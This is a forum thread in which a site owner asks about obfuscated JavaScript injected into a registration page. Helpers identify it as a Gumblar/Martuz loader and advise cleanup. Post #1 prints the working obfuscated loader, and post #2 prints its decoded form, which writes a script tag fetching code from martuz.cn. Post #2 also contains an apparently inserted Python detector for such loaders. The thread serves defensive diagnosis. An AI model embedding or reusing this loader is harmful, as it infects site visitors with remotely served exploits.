  1. #1 zeeshanhashmi

    Strange JS Code!

    Hi

    I have a website and it was working OK, but for the last month there have been issues and I can't access a particular form on my website.

    When I checked, I noticed that my firewall is blocking it as it has some strange JS code (I saw the strange code via View Source on another computer). I am placing the code here so that anyone can suggest what I should do.

    The following code occurs after the [/head] and before the [body] tags.

    Code:
    <script language=javascript><!-- 
    (function(){var bpAjN='%';var igdR='var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();
     --></script>
    Please also note that this code appears when I use View Source. However, I have all these files on my local computer, and when I open them in any program, there is no such code. But whenever I put them online and view the source, it shows me the above strange code.

    Please tell me what this is, and how I can remove it.
    Thanks


    Zeeshan

  2. #2 Mittineague
    It's weakly obfuscated code that runs this:
    Code:
    var igdR='var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}';
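    As an added illustration (not code from this thread or from either poster), the Python below automates what Mittineague did by hand: it looks for the loader shape var X='%';var Y='...';var Z=Y.replace(/-/g,X);eval(unescape(Z)) in a page, puts the '%' back for every '-', percent-decodes the result the way JS unescape() does, and joins the split "mart"+"uz.cn" literals so the remote host is readable. It goes a step beyond the post in that the same function can be run over every uploaded file when checking a server for this injection. The page fragment and all function and regex names are mine; the encoded string is the one from the first post.

```python
import re

# The encoded string exactly as it appears in the first post (hyphens stand in for '%').
PAYLOAD = ('var-20a-3d-22ScriptE-6egine-22-2c-62-3d-22-56e-72si-6fn-28)+-22-2cj-3d-22-22-2cu-3d-6eavigator-2eu-73er-41gent-3bif(-28u-2ei-6edexOf(-22Chrome-22-29-3c0-29-26-26(u-2ein-64e-78Of(-22Win-22)-3e0-29-26-26(u-2ei-6edexOf-28-22NT-20-36-22)-3c0-29-26-26(-64ocum-65nt-2ec-6fokie-2e-69nd-65-78Of(-22miek-3d-31-22-29-3c0)-26-26(typ-65-6f-66(zrvzt-73)-21-3dtype-6ff(-22A-22)))-7bzrvz-74-73-3d-22A-22-3be-76-61l-28-22if(-77-69ndow-2e-22+-61+-22)j-3dj+-22+a-2b-22Maj-6f-72-22+b+-61+-22Min-6f-72-22+-62+-61+-22Bui-6cd-22+b+-22j-3b-22-29-3bdo-63-75m-65-6et-2ew-72ite(-22-3cscript-20s-72c-3d-2f-2fm-61rt-22+-22uz-2ec-6e-2fvi-64-2f-3fid-3d-22+j+-22-3e-3c-5c-2fscr-69p-74-3e-22)-3b-7d')
# Constructed page fragment wrapping it the way the thread describes (after </head>, before <body>).
SAMPLE_HTML = ("</head>\n<script language=javascript><!-- \n(function(){var bpAjN='%';var igdR='"
               + PAYLOAD + "';var by61A=igdR.replace(/-/g,bpAjN);eval(unescape(by61A))})();\n"
               " --></script>\n<body>")

# Loader shape: var X='<char>';var Y='<encoded>';var Z=Y.replace(/-/g,X);eval(unescape(
INJECT_RE = re.compile(r"var\s+(\w+)='([^']+)';\s*var\s+(\w+)='([^']+)';\s*"
                       r"var\s+\w+=\3\.replace\(/-/g,\1\);\s*eval\(unescape\(")
ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")   # what JS unescape() decodes
SPLIT_RE = re.compile(r'"([^"]*)"\+"([^"]*)"')                  # "mart"+"uz.cn" style splits
HOST_RE = re.compile(r"src=(?:https?:)?//([\w.\-]+)")

def js_unescape(s):
    """Decode %XX and %uXXXX like JavaScript's unescape(); anything else is left as-is."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decode_payload(encoded, escape_char="%"):
    """Reverse the loader: put the escape character back for every '-' and percent-decode."""
    return js_unescape(encoded.replace("-", escape_char))

def join_split_literals(js):
    """Merge "a"+"b" into "ab" repeatedly so hostnames split across literals read whole."""
    while True:
        merged = SPLIT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
        if merged == js:
            return js
        js = merged

def find_injections(html):
    """Return a list of {'decoded': <js>, 'hosts': [...]} for each loader found in html."""
    findings = []
    for m in INJECT_RE.finditer(html):
        decoded = decode_payload(m.group(4), m.group(2))
        hosts = sorted(set(HOST_RE.findall(join_split_literals(decoded))))
        findings.append({"decoded": decoded, "hosts": hosts})
    return findings

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_HTML):
        print("loads script from:", ", ".join(hit["hosts"]))
        print(hit["decoded"])
```

    Run over a directory of uploaded files, an empty result for every file is the "clean" state; any hit names the remote host the injected loader would fetch from.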

  3. #3 Crazybanana
    It's been a while since I saw this, and it looks like it's been slightly modified.

    It is a modified version of the infamous "Gumblar exploit" or "fake yahoo counter", as it also appeared in some versions...

    This version, however, uses another domain, which is Martuz dot cn.

    There is also an added check to see if you use Google Chrome, so as not to load the external script if Chrome is used.

    The rest looks like the old Gumblar exploit to me.

    It normally happens because your PC is infected with trojans and sniffers that scan your puter for usernames and passwords and send these to a server for further use.

    They then make use of this info to inject/place this iframe and code in your files. It infects php/html/js etc.; it also makes some new files and disguises some of them as pictures/jpg etc.

    Fire up regedit and have a look for this reg value: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux" (or aux2). If you find it, delete it.

    Clear all files on the server and make sure you replace them with FRESH new ones, not new infected ones. Scan your server's folders and files for strange unknown files and pictures, and delete them if you find any.

    Scan your PC and clear ALL your TEMP files. Change passwords when you have cleaned your puter and cleared its cache and Temp files, but first do a restart, then change passwords.

    This can be nasty, and in many cases people almost gave up because it kept coming back no matter what they did. So it's important to make sure you've cleaned your local PC properly.

    You can find more information on this by doing a Google search for the "Gumblar exploit" and "fake yahoo counter", as this on your site is just a slightly modified version of it.
    Who's to doom when the judge himself is dragged before the bar


  4. #4 Crazybanana
    I had to make some food here... but here is some more info. You can also find more, as it has been discussed in some previous posts, back when it was pure Gumblar code...

    The code triggers another address, as you can see from Mittineague's post of the de-obfuscated code... there are two exploits triggered and trying to execute on the "victim's" computer. You see from the code that it targets IE prior to NT6 (Vista), and it tries to exploit known vulnerabilities in Adobe PDF and Flash Player to execute its code and infect as many as possible.

    But as I said, it is most likely to have its roots in something installed on your local puter.


  5. #5 zeeshanhashmi
    Okay, but I have a few other websites as well, and I have uploaded some other files to each of those websites, and there are no such problems.

    What do you think?

  6. #6 zeeshanhashmi
    Moreover, the strange code is appearing on only one page, which is a Registration Form, and on only one hosting server. When I tried it on a different server, it was OK.

    @Crazybanana
    The Registry thing you mentioned is related to the SOUND CARD driver of the system. If I delete that it will turn the sound off.

  7. #7 Mittineague
    Have you
    1. Cleaned your computer?
    2. Changed usernames/passwords, including FTP?
    3. Re-uploaded the website files from a clean backup?

    I realize it's a bit of work, but that's what needs to be done.

  8. #8 Crazybanana
    Quote Originally Posted by zeeshanhashmi
    Okay, but I have a few other websites as well, and I have uploaded some other files to each of those websites, and there are no such problems.

    What do you think?
    What I think is still the same as before. It is probably something on your local PC, or it could be weak security/code in some of your scripts running on the page.

    Scan your PC with the newest AVG, Avast, Malwarebytes, Norton etc... Make sure you clear all your TEMP files. This is the content of the folder "Temp" inside the hidden "Local Settings" folder, and of the hidden folder "Content.ie5" inside your hidden "Temporary Internet Files" folder. And clear all other cache and history. You have to boot into safe mode to delete some of it, and remember: just the contents of these folders, not the folders themselves.

    Scan for viruses both in safe mode and normal mode, as some files/viruses can only be dealt with in SAFE MODE!

    Empty the Trash, reboot and scan again, and do a netstat from the command line to look for suspicious connections.

    Quote Originally Posted by zeeshanhashmi
    Moreover, the strange code is appearing on only one page, which is a Registration Form, and on only one hosting server. When I tried it on a different server, it was OK.
    The code is not strange anymore, as we have told you what it is and what it does now.

    Maybe your code/script/app has a weakness that allowed it to be exploited to inject the code, but I doubt it from what you've told us above. It looks like there is something stored on that server that injects this code as soon as you upload it.

    Quote Originally Posted by zeeshanhashmi
    @Crazybanana
    The Registry thing you mentioned is related to the SOUND CARD driver of the system. If I delete that it will turn the sound off.
    Thanks for informing me of this, but to enlighten you a bit I can tell you that this "virus/keylogger/(spam)bot/creditcard snatcher/FTP password stealer/info stealer" is loaded by registering as an auxiliary sound driver to fool novice users,
    so have a second look at it to see if something has been added, or if it looks suspicious. If you're unsure, post the regkey for others to have a look, or copy and paste this into Notepad and save it as regfix.reg (choose to save as all files to get the .reg), but back up the registry/registry key first:

    Code:
    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
    "aux"="wdmaud.drv"
    Delete the regkey and replace it by double-clicking on the regfix.reg on your desktop. And remember, if you're unsure, post the regkey for others to have a look...

    Check error logs (if any) and clean the server. Then upload a clean copy (after you've cleaned your puter). Make sure that what you upload is clean, as this "virus" creates fake files and embeds itself in almost all kinds of files; it also disguises itself as images and scripts etc., so double check everything to be sure.

    It is very important to clear the cache, as some files run from... yeah, that's right, from Cache.

    After doing all this, change your usernames/passwords, including those for FTP, and do a netstat as I said to double check... Then upload new clean content and let us know what's happening...


  9. #9 zeeshanhashmi
    Woooof!

    Thanks a lot for sharing all this; I will definitely look into all that you have suggested.

    But here is something: as you said my local computer might have something, IF yes, then why does it only inject the JS code and show it on one hosting? Why not on the other sites I have been working on?

  10. #10 Mittineague
    Do all your sites have the same username, password and files?

  11. #11 Crazybanana
    Quote Originally Posted by zeeshanhashmi
    But here is something: as you said my local computer might have something, IF yes, then why does it only inject the JS code and show it on one hosting? Why not on the other sites I have been working on?
    I would probably know this for sure if this was my hack, but as it is, I have nothing to do with it and cannot know for sure.

    But there are several things I could speculate about... like some passwords are stored and some need to be typed each time of use; or contact was lost between your PC and the server/hosting of the malicious gathering script; the hosting server was shut down or the sw removed; your virus/malware app found it and deleted it; your other info has not yet been used by the attackers; sw/scripts on your server have been patched; or you've just been lucky.

    Anyway, there has been a hack, and if you ignore it without further investigation, it will most likely happen again.


  12. #12 zeeshanhashmi
    No, the other sites' FTP login details are different, and the files are different too.

    But when I uploaded the thing to another hosting for testing, it was OK there and there was no such code. But when I moved the files to the actual server, it shows the code.

  13. #13 zeeshanhashmi
    Is it possible that the HOSTING SERVER is infected?

  14. #14 Crazybanana
    Quote Originally Posted by zeeshanhashmi
    Is it possible that the HOSTING SERVER is infected?
    Yes, this is possible, as we said above. The server is infected and injects the code/script into your files, but... the infection possibly and most likely started from your PC (or another PC that has had access to the server).

    This is how this martuz/Gumblar exploit/virus works (at least this is how it used to work, but I guess it's working the same way now, even if some of the scripts are rewritten a bit).

    This virus/exploit doesn't spread outside of the user account that is infected, so search the server you are using for any suspicious files and scripts. Also remember that it embeds itself in other files, so even if you don't see any unknown or suspicious files or folders, it can still be there, embedded in other legitimate files. But also remember to double check the computers that have had access to the server which has this problem.


  15. #15 zeeshanhashmi
    Yes, that is what I thought earlier, as my client also has access to that server. Well, I have access to 100s of different servers, but none of them is infected. That means my computer is not infected, and it's the particular client's PC which has the virus and thus infected his server.

    Thanks a lot CrazyBanana, and all others.

  16. #16 Mittineague
    You ran some thorough scans of your computer and they all came up clean?
    If they did then your assumption based on the diagnosis of the symptoms is most likely correct.

  17. #17 Crazybanana
    Quote Originally Posted by zeeshanhashmi
    Yes, that is what I thought earlier, as my client also has access to that server. Well, I have access to 100s of different servers, but none of them is infected. That means my computer is not infected, and it's the particular client's PC which has the virus and thus infected his server.

    Thanks a lot CrazyBanana, and all others.
    I would scan my PC anyway to make sure; access to so many servers has some serious responsibility following. You should also tell your client about this issue.


  18. #18 zeeshanhashmi
    For scanning and cleaning the following:

    1) Trojan
    2) Worm
    3) Spam Software / Spyware
    4) PUP (Potentially Unwanted Programs)
    5) anything else

    what is the best FREE software available?

